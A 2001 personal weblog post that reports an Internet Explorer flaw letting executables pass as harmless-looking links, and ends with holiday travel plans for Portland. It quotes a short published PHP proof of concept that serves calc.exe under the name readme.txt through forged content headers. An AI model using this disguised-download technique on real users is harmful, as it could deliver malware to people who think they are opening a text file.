December 12th, 2001


HUGE security weakness in Internet Explorer

Looks like Internet Explorer has a bug in it that is so wide you can drive a truck through it. Imagine clicking on what seems to be a standard html link in IE and having it execute a program on your computer... the file extension could be anything - readme.txt, robot.wav, index.html ... ouch.

Apparently, a PHP exploit has been published on Bugtraq more than a week ago that demonstrates the vulnerability:

1. Copy the real windows calc.exe from a windows system to the html root dir.

2. Copy the readme.txt file below to the same html root dir.

3. go to the url http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.

FILE <readme.txt> BEGIN ----
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
FILE <readme.txt> END ----

Unfortunately, Microsoft doesn't consider this is a vulnerability; they say that the trust decision should be based on the file source and not type. Who can you trust? Hm... that's a hard one, considering that even reputable commercial software vendors have been (accidentally) guilty of distributing virii along with their software... and can you trust any link on any personal site (such as a journal, weblog, etc.) really? Unfortunately, this bug is so sweeping that it stops making this issue a matter of trust, and more a matter of blind faith that we won't be the ones effected. Does this mean that your "friends" can be infected by a virus that will email you with friendly banter and tell you to check out an innocuous looking link with a "safe" file extention?!

What Microsoft is really asking you to do is trust no one - except them. They refuse to see their great contributions in making the Internet such a dangerous place to be... meanwhile, virii that primarily target their software's security flaws routinely cost people billions of dollars a year.

Until Microsoft starts taking security a lot more seriously and stops pushing the responsibility entirely back on the user, there is only one simple solution to this bug - don't use IE anymore.

Travel Travails

Looks like Kirsten and I will be going up to Portland, OR for Dec. 22nd-26th... but I have the great majority of that time free and I don't know what to do with it.

I was thinking about a road trip to Seattle, coming back on the 25th. Also would like to meet a lot of people, but if I named them all, it would be too much like watching Romper Room.

"Romper stomper bomper boo!
Tell me tell me tell me who!
I look into my mirror and who do I see?
Celestina and Arianna and Kill and..."

So, some of you live in that general area... you know the place. You even know my interests. What should I do when I'm up there? Who should I do it with? Here's your big chance to plan my itinerary for me!